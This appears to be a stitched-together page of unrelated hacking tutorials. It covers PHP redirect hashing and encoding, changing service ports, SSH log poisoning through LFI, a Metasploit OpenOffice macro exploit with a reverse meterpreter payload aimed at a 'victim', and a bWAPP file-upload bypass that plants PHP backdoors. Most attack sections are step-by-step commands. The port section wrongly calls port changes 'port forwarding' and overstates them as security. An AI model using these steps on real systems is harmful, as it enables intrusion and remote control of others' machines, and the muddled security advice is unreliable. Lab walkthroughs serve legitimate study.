Understanding Redirection with Hashing and Crypto Salt (Part 2)

In previous article we have explained the concept of redirection with basic redirection and encoded redirections; in this article we will cover the more secured redirection using hashing and salting techniques.

In this article also we will be covering the redirection using the same php scripts with little modification within the code.

Redirection using Hash Values

On browser type http://localhost/hashing/home.php

Hover on Redirect Link pointing to redirection page (re.php). We can see that the redirection link not only contains the URL as a parameter but also the hash which means that we are not only passing the URL as a parameter but also generating the hash value using MD5/SH1/SHA512 or any of the hashing algorithm and redirection will only work if the combination of url and its hash is correct else not.

(Shown in the figure below). This is a more secure way of redirection.

 For the sake of understanding our redirection link is showing the parameters like URL and Hash but in case or real development we can hide them so that attacker won't be able to judge where the page is being redirected.

When we click on Redirect Link redirection script  on re.php will catch the passed URL and generate its hash value (we are using MD5 hash algorithm) and compare the generated hash value with the hash value we have sent with the request, if both the hash values matches the redirection would work else it will fail.

WE are using hash calculator for generating the MD5 Value of "http://www.hackingarticles.in".

The MD5 hash value of "http://www.hackingarticles.in" is 8258c1efb05943d059476150cb22df1d

 In the below image we are replacing the original hash value of "http://www.hackingarticles.in"   from its original value which is "8258c1efb05943d059476150cb22df1d" to any different value for example "9258c1efb05943d059476150cb22df1d" (we have replaced only first digit from 8 to 9).

The redirection has failed and script has returned an error message. Finally we are sending the URL along with the generated Hash Value as parameter and result is below

Redirection using Hash Values with salting

On browser type http://localhost/hashing/home.php (page where we have our scripts)

Hover on Redirect Link pointing to redirection page (re.php). Here we can see one more additional parameter salt. As in previous methodology we have worked with Hash values , while working with salting we are introducing  one more parameter salt and generating the hash value of the URL by pre pending or appending the salt value in front of the url or at the end of the url. Salt value could be anything, it could be a combination of characters, digits , alphanumeric , special character or anything we want (In this example we are using the salt value "ignite"). By using salts we are further increasing the security for redirecting the URL.

  For the sake of understanding our redirection link is showing the parameters like URL and Hash and Salt but in case or real development we can hide them so that attacker won't be able to judge where the page is being redirected.

 When we click on Redirect Link redirection script on re.php will catch the passed URL and generate its hash value (we are using Sha1 hash algorithm) by appending the salt value (ignite) in front of the URL and compare the generated hash value with the hash value we have sent with the request, if both the hash values matches the redirection would work else it will fail.

in Above image we are generating the Sha1 hash value by appending the salt "ignite"  in front of the URL "http://www.hackingarticles.in" , we can use any online/offline convertor in this example we are generating Sha1 hash through http://online-code-generator.com/sha1-hash-with-optional-salt.php

The sha1 hash value of the URL with salt is: 5955e7e3533a0afac6ddfee60a32e2a6731cf626

If the hash value sent is different from the original value our script will return an error. In below Image we are changing the sha1 hash value from 5955e7e3533a0afac6ddfee60a32e2a6731cf626 to 8955e7e3533a0afac6ddfee60a32e2a6731cf626 (we are replacing only first digit from 5 to 8) we will get the following result.

Finally we are sending the URL along with the generated Hash Value as parameter and result is below

Understanding Redirection with Encoding Techniques (Part 1)

A redirect automatically sends website's visitors to some different location or URL; redirection could be either at different location within the same site or a new site or webpage.

Unsecure redirection and forwarding are the outcomes when a web application accepts untrusted inputs that could cause the web application to redirect the request to a URL contained within untrusted/Unvalidated input, we can also call this type of redirection as Unvalidated Redirection.

We are demonstrating the actual concept and types of redirection through a PHP code running under apache server on a local machine running kali Linux. We can also use wamp or xampp server for windows machine to run and execute these codes. For executing our redirection scripts, put the codes in /var/www/html directory: This is the directory pointing to localhost (in our case).

References

 http://php.net/manual/en/function.header.php

https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet

Basic Redirection

On browser type localhost/redirect/home.php

Hover on Redirect Link, pointing to redirection page (re.php). We can see the redirection on clear text format below. (As shown in the figure below). 

When we click on this link, we will be redirected to http://www.hackingarticles.in, as we have coded in our redirection script (re.php).

This is the basic redirection where we are simply redirecting the users from one page to another page through php scripts without considering any security measures in account. The further encoding parameters of redirection are explained below.

URL Encoding

On browser type localhost/hex/home.php (page where we have our scripts)

Hover on Redirect Link, pointing to redirection page (re.php). We can see the redirection on clear text format below.(As shown in the figure below).

Here we are using the same script for the home page but in this redirection we are using simple URL encoding where we can send our URL in URL Encoded format  and the encoded URL is being decoded through the script running on our redirected php page(re.php in this case).

WE can use any online /offline converter for calculating URL encoded value (in this example we are using http://www.meyerweb.com/)

Refer below screenshot for URL encoding.

 Right click on Redirect Link on home.php and copy link location and past the URL in new tab. If we replace the redirected URL with URL encoded value we will land on the same page.

The following is the result

HEX Encoding

Here we are converting the URL in its Hexadecimal Value using Burp suite (you can use any online/offline tool).

Single Hex encoded value of http://www.hackingarticles.in is

%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%69%6e%67%61%72%74%69%63%6c%65%73%2e%69%6e

Right click on Redirect Link on home.php and copy link location and past the URL in new tab. If we replace the redirected URL with single hex encoded value we will land on the same page

The following is the result

Multilevel Encoding

Here we are demonstrating the multilevel encoding where we are re-encoding the pre encoded values.

Double Hex encoded value of http://www.hackingarticles.in is

%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%37%25%37%37%25%37%37%25%32%65%25%36%38%25%36%31%25%36%33%25%36%62%25%36%39%25%36%65%25%36%37%25%36%31%25%37%32%25%37%34%25%36%39%25%36%33%25%36%63%25%36%35%25%37%33%25%32%65%25%36%39%25%36%65

Right click on Redirect Link on home.php and copy link location and past the URL in new tab. If we replace the redirected URL with double hex encoded value we will land on the same page.

The following is the result

Base 64 Encoded Redirection

On browser type http://localhost/base64/home.php

Hover on Redirect Link, pointing to redirection page (re.php). Here we are pre encoding our URL to its base 64 encoded value because of which our URL is something which can't be understandable with naked eye .(As shown in the figure below). 

 Below image shows the Base64 encoding of our URL http://www.hackingarticles.in

Base64 encoded value of http://www.hackingarticles.in is

 “aHR0cDovL3d3dy5oYWNraW5nYXJ0aWNsZXMuaW4=”

The following is the output

How to Secure Your Port using Port Forwarding

In this article I am going to perform how to use port forwarding in a system which is a process that redirects a communication request from a specific port to another port or host. It is basically allows an outside computer to connect to a computer in a private local area network. Some commonly done port forwarding includes forwarding port 22 for SSH access, forwarding port 80 for web servers and port 21 for FTP. The major advantage is that it provides security to your private network and secure communication

.

Let’s start !!!!

HTTP and HTTPS forwarding

Open ports.conf file from inside /etc/apache2 and type following command to read the configuration.

Cat ports.conf

From screenshot you can view the present listening port 80 and 443 for web server.

If an attacker wants to send malicious file through web server he will try to connect with target using port 80 send the phishing page to the target.

In order to protect you from being targeted through phishing page change the port number from 80 and 443 into other number. 

If you notice the following screenshot here you will that I have modified port 80 into 8088 and port 443 into 44343.

FTP port forwarding

Now open the vsftpd.conf file from inside /etc.

From screenshot you can view listen port is 21 by default, to protect yourself from FTP attacks shift the FTP service on other port.

From given below screenshot you will find that I have change port21 into 2121

SSH port forwarding

Open file sshd_config from / etc/ssh/ssd_config

From screenshot you will find that by default port 22 is use as listen port which is badly affected by DDOS attack. Here to protect yourself apply port forwarding techniques on port 22.

From below image, again you will notice that I have change port 22 into port 2222.

Now if you will scan your network with help of NMAP you will find that the services FTP, HTTP and SSH is successfully running on the modified ports.

Nmap –p- -sV 192.168.1.24

Web Server Exploitation with SSH Log Poisoning through Lfi

In this article you will learn how make unauthorized access in a web server if it is suffering from local file inclusion vulnerability with help of auth log file. To perform this attack first you need to read my previous article which will help you to create local file inclusion vulnerability manually.

Attacker: Kali Linux

Target: Metasploitable 2

Open terminal in your kali Linux and connect the target using SSH service

ssh msfadmin@192.168.1.105

From screenshot you can see I am connected with target PC, now type following command to check the permission for auth.log file

Ls –l /var/log/auth.log

Now if you notice the given screenshot again you will find that the highlighted text is showing read write permission had been given to auth.log file.

Since we know that the auth.log file has read permission therefore type following command to view its logs.

Tail –f /var/log/auth.log

The highlighted text is showing the log for the valid user msfadmin.

Now open another terminal in kali where I will try to connect with web server using fake user name and then confirm whether any log is generated inside auth.log file for invalid user or not.

Ssh hacker@192.168.1.105

When you move back to your previous terminal you find it has created a log for invalid user hacker which you can also check in the given screenshot.

Hence it is confirm that auth.log file generates log for every failed and pass login when we try to connect with web server. Taking advantage of this feature now I will send PHP code as fake user and it will get added automatically in auth.log file as new log.

Ssh ‘’@192.168.1.105

Again when you check its log, you will find the PHP code has been added as new log.

Since I have already created LFI vulnerability manually inside the web server, so if you want to create LFI vulnerability view above link of previous article.

In given screenshot you can see when I have browse lfi.php file; it has shown some error which looks like local file inclusion vulnerability.

Now include the auth.log file as file parameter and give following URL inside browser.

192.168.1.105/lfi/lfi.php?file=/var/log/auth.log

From screenshot you can read the warning cannot execute blank command, it means our PHP code which was containing CMD comment is successfully injected now only we need to send any command as parameter

192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps

Here it will dump the data of auth log as well as execute comment given through cmd. From screenshot you can view both log as well as process state.

In same way execute pwd through cmd and view the result from inside the given screenshot.

Exploiting Remote PC with Apache OpenOffice Text Document Malicious Macro Execution

This module generates an Apache OpenOffice Text Document with a malicious macro in it. To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning. The module also works against LibreOffice.

Exploit Targets

Apach Open Office on Windows

Requirement

Attacker: kali Linux

Victim PC: Windows 10

Open the terminal in kali Linux and type msfconsole to load metasploit framework.

Now type use exploit/multi/misc/openoffice_document_macro

msf exploit (openoffice_document_macro)>set payload windows/meterpreter/reverse_tcp

msf exploit (openoffice_document_macro)>set lhost 192.168.0.104 (IP of Local Host)

msf exploit (openoffice_document_macro)>set srvhost 192.168.01.04

msf exploit (openoffice_document_macro)>set lport 4444

msf exploit (openoffice_document_macro)>exploit

 From the screenshot you can see the highlighted text is showing the path of malicious odt file.

The malicious odt File had been generated successfully which is stored on your local computer inside following path:

/root/.msf4/local/msf.odt

Now send your msf.odt files to victim, as soon as he download and open it, you can access meterpreter shell on victim computer.

File Upload Exploitation in bWAPP (Bypass All Security)

In this article you will learn how to bypass all three security level of unrestricted file upload inside the bWAPP and if you want to know more about the various kind of file uploading vulnerability read previous article that may help you to understand this article more clearly.

LOW SECURITY

Open the target IP in browser: 192.168.0.106/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select Unrestricted File Upload now and click on hack.

Create PHP backdoor using msfvenom and start multi handler in the background; now from screenshot you can see I have browse meter.php for uploading as an image inside the web server.

When the image gets successfully uploaded on the web server it will send the link of directory where image is saved to view the uploaded image. Since we haven’t upload any real image therefore we will try to execute our PHP backdoor by making click on the link “here”.

When victim click the above link “here” we will get victim’s reverse connection through meterpreter session inside the metasploit framework.

From screenshot you can see metasploit session 1 is opened.

MEDIUM SECURITY

As the level of security is change so here we cannot able to perform same procedure as above. Although here you just need to change only the extension of your PHP backdoor to bypass medium security. If you notice the image given below here you will find that I have browse meter.php3 for uploading

Now repeat the same step run multi handler at background and make click on the given link “here” to receive metrpreter session.

GREAT!!! From screenshot you can see metasploit session 2 is opened

HIGH SECURITY

Now we have enter into high security where above two file uploading attack will get failed so here again you need to make some small changes  into the extension of PHP backdoor file for uploading it in the web server.

From screenshot you can read the file name high.php.png which I have browse for uploading.

Here our file is successfully uploaded now make right click on the link “here” to copy link location and keep multi handler running at the background.

To bypass high security of file uploading in bWAPP we need to switch the bug as well as security level.

Set security level low and choose the bug remote & local file Inclusion then click on hack.

Here the requested web page which suffering from RFI & LFI Vulnerability gets open. Where you will find a comment to select a language from the given drop down list, and when you click on go button the selected language file get included in URL.

 Since I have uploaded the PHP backdoor shell in high security but execute that backdoor through low security with help of LFI vulnerability. Now just manipulate the following URL as shown in screenshot.

http://192.168.0.106/bWAPP/rlfi.php?language=lang_en.php&action=go into 192.168.0.106/bWAPP/rlfi.php?language=images/high.php.png

When above URL is executed in the browser you will get victim’s reverse connection inside metasploit.

Congrats!!! From screenshot you can see metasploit session 3 is opened.

Hence we have bypassed all three security level inside bWAPP